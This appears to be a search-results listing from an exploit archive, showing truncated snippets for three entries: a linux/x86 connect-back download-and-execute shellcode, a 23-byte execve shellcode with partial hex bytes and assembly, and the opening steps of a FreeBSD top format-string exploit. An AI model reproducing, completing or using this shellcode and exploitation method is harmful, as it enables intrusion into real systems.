3 matches found
linux/x86 connect back, download a file and execute 149 bytes
Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 connect back, download a file and execute 149 bytes ============================================================= / ;file download shellcode 149 bytes ; ;connect back,...
linux/x86 execve code 23 bytes
linux/x86 execve code 23 bytes. Shellcode exploit for linx86 platform / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f / "\x89\xe3...
FreeBSD - usrbintop Format String
FreeBSD - usrbintop Format String / freebsd x86 top exploit affected under top-3.5beta9 including this version 1. get the address of .dtors from /usr/bin/top using objdump , 'objdump -s -j .dtors /usr/bin/top' 2. divide it into four parts, and set it up into an environment variable like "XSEO=" 3...